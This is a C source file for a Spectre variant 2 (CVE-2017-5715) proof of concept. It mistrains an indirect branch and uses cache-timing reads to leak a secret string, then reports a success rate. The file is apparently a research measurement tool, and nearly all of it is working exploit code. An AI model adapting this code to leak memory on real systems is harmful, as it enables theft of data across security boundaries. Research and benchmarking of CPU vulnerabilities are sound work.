248 lines
6.6 KiB
C
248 lines
6.6 KiB
C
/* spectre.c - CVE-2017-5715 user-to-user sucess rate measurement
|
||
*
|
||
* Borrows code from
|
||
* - https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6
|
||
*
|
||
* Copyright (c) 2022 Samuel AUBERTIN
|
||
*
|
||
* Permission to use, copy, modify, and distribute this software for any
|
||
* purpose with or without fee is hereby granted, provided that the above
|
||
* copyright notice and this permission notice appear in all copies.
|
||
*
|
||
* THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
|
||
* WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
|
||
* MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
|
||
* ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
|
||
* WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
|
||
* ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
|
||
* OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
|
||
*/
|
||
|
||
#include "octopus.h"
|
||
|
||
#define GAP 1024
|
||
|
||
char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";
|
||
uint64_t* target; // pointer to indirect call target
|
||
unsigned int cache_hit_threshold, array1_size = 16;
|
||
uint8_t unused1[64], unused2[64], array2[256 * 512], array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
|
||
//uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */
|
||
uint8_t channel[256 * GAP]; // side channel to extract secret phrase
|
||
|
||
// mistrained target of indirect call
|
||
int
|
||
gadget(char* addr)
|
||
{
|
||
return channel[*addr * GAP]; // speculative loads fetch data into the cache
|
||
}
|
||
|
||
// safe target of indirect call
|
||
int
|
||
safe_target(char* addr)
|
||
{
|
||
return 42;
|
||
}
|
||
|
||
// function that makes indirect call
|
||
// note that addr will be passed to gadget via %rdi
|
||
int
|
||
victim_function(char* addr, int input)
|
||
{
|
||
#pragma GCC diagnostic ignored "-Wuninitialized"
|
||
unsigned int result, junk = junk;
|
||
// set up branch history buffer (bhb) by performing >29 taken branches
|
||
// see https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html
|
||
// for details about how the branch prediction mechanism works
|
||
// junk and input used to guarantee the loop is actually run
|
||
for (int i = 1; i <= 100; i++) {
|
||
input += i;
|
||
junk += input & i;
|
||
}
|
||
// call *target
|
||
__asm volatile(
|
||
"mov %%rax, %2\n"
|
||
"callq *%1\n"
|
||
"mov %0, %%eax\n"
|
||
: "=r" (result)
|
||
: "r" (*target), "rm" (addr)
|
||
: "rax", "rcx", "rdx", "rsi", "rdi", "r8", "r9", "r10", "r11");
|
||
return result & junk;
|
||
}
|
||
|
||
static inline void
|
||
leak(char* target_addr, uint8_t value[2], int score[2], unsigned cache_hit_threshold)
|
||
{
|
||
static int results[256];
|
||
int tries, i, j, mix_i;
|
||
unsigned int junk = 0;
|
||
volatile uint8_t* addr;
|
||
char dummy = '@';
|
||
#ifdef NOCLFLUSH
|
||
int junk2 = 0;
|
||
int l;
|
||
(void)junk2;
|
||
#endif
|
||
for (i = 0; i < 256; i++) {
|
||
results[i] = 0;
|
||
channel[i * GAP] = 1;
|
||
}
|
||
for (tries = 999; tries > 0; tries--) {
|
||
// Malicious target
|
||
*target = (uint64_t)&gadget;
|
||
#ifndef NOMFENCE
|
||
_mm_mfence();
|
||
#endif
|
||
for (j = 50; j > 0; j--) {
|
||
junk ^= victim_function(&dummy, 0);
|
||
}
|
||
#ifndef NOMFENCE
|
||
_mm_mfence();
|
||
#endif
|
||
|
||
#ifndef NOCLFLUSH
|
||
for (i = 0; i < 256; i++) {
|
||
_mm_clflush(&channel[i * GAP]);
|
||
}
|
||
#else
|
||
for (j = 0; j < 16; j++) {
|
||
for (i = 0; i < 256; i++) {
|
||
flush_memory_sse(&channel[i * GAP]);
|
||
}
|
||
}
|
||
#endif
|
||
#ifndef NOMFENCE
|
||
_mm_mfence();
|
||
#endif
|
||
|
||
// change to safe target
|
||
*target = (uint64_t)&safe_target;
|
||
|
||
#ifndef NOMFENCE
|
||
_mm_mfence();
|
||
#endif
|
||
// flush target to prolong misprediction interval
|
||
#ifndef NOCLFLUSH
|
||
_mm_clflush((void*) target);
|
||
#else
|
||
flush_memory_sse((void*) target);
|
||
#endif
|
||
#ifndef NOMFENCE
|
||
_mm_mfence();
|
||
#endif
|
||
// call victim
|
||
|
||
//printf("victim with %p\n", target_addr);
|
||
junk ^= victim_function(target_addr, 0);
|
||
#ifndef NOMFENCE
|
||
_mm_mfence();
|
||
#endif
|
||
// now, the value of *addr_to_read should be cached even though
|
||
// the logical execution path never calls gadget()
|
||
/* Time reads. Order is lightly mixed up to prevent stride prediction */
|
||
for (i = 0; i < 256; i++) {
|
||
mix_i = ((i * 167) + 13) & 255;
|
||
addr = & channel[mix_i * GAP];
|
||
if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size]) {
|
||
results[mix_i]++; /* cache hit - add +1 to score for this value */
|
||
}
|
||
}
|
||
/* Locate highest results in j */
|
||
j = -1;
|
||
for (i = 0; i < 256; i++) {
|
||
if (j < 0 || results[i] >= results[j]) {
|
||
j = i;
|
||
}
|
||
}
|
||
if (results[j] >= 3) {
|
||
break;
|
||
}
|
||
}
|
||
results[0] ^= junk; /* use junk so code above won’t get optimized out*/
|
||
value[0] = (uint8_t) j;
|
||
score[0] = results[j];
|
||
}
|
||
|
||
int
|
||
main(int argc, char** argv)
|
||
{
|
||
int o, score[2], len = (int)strlen(secret), json = 0, successes = 0;
|
||
uint8_t value[2];
|
||
char* secret_addr = secret;
|
||
|
||
while ((o = getopt(argc, argv, "t:j")) != EOF) {
|
||
switch (o) {
|
||
case 't':
|
||
cache_hit_threshold = atoi(optarg);
|
||
break;
|
||
case 'j':
|
||
json++;
|
||
break;
|
||
default:
|
||
usage:
|
||
fprintf(stderr, "usage: %s [-j] "
|
||
"[-t threshold]\n"
|
||
"\t-j\t\tJSON output\n"
|
||
"\t-t INT\t\tfixed threshold\n", argv[0]);
|
||
return 1;
|
||
}
|
||
}
|
||
if (argc != optind) {
|
||
goto usage;
|
||
}
|
||
|
||
target = (uint64_t*)malloc(sizeof(uint64_t));
|
||
fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5715:\n[?] ", argv[0] + 2, len);
|
||
calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold);
|
||
#ifdef NOCLFLUSH
|
||
for (i = 0; i < (int)sizeof(cache_flush_array); i++) {
|
||
cache_flush_array[i] = 1;
|
||
}
|
||
#endif
|
||
while (--len >= 0) {
|
||
leak(secret_addr++, value, score, cache_hit_threshold);
|
||
if(score[0] == 3 && value[0] > 31 && value[0] < 127) {
|
||
successes++;
|
||
fprintf(stderr, "\033[32m%c\033[0m", (value[0]));
|
||
} else {
|
||
fprintf(stderr, "\033[31m?\033[0m");
|
||
}
|
||
}
|
||
fprintf(stderr, "\n");
|
||
if (json) {
|
||
printf("{ \"%s\": { \"capacities\": { ",argv[0] + 2);
|
||
#ifndef NORDTSCP
|
||
printf("\"rdtscp\": true, ");
|
||
#else
|
||
printf("\"rdtscp\": false, ");
|
||
#endif
|
||
#ifndef NOMFENCE
|
||
printf("\"mfence\": true, ");
|
||
#else
|
||
printf("\"mfence\": false, ");
|
||
#endif
|
||
#ifndef NOCLFLUSH
|
||
printf("\"clflush\": true ");
|
||
#else
|
||
printf("\"clflush\": false ");
|
||
#endif
|
||
printf("}, ");
|
||
printf("\"threshold\": %d, ", cache_hit_threshold);
|
||
printf("\"success\": %.0f } }", 100 * successes / (float)strlen(secret));
|
||
}
|
||
fprintf(stderr, "[+] %-27s\t",argv[0] + 2);
|
||
#ifndef NORDTSCP
|
||
fprintf(stderr, "RDTSCP ");
|
||
#else
|
||
fprintf(stderr, "RDTSC ");
|
||
#endif
|
||
#ifndef NOMFENCE
|
||
fprintf(stderr, "MFENCE ");
|
||
#endif
|
||
#ifndef NOCLFLUSH
|
||
fprintf(stderr, "CLFLUSH ");
|
||
#endif
|
||
fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", cache_hit_threshold, 100 * successes / (float)strlen(secret));
|
||
free(target);
|
||
return 0;
|
||
}
|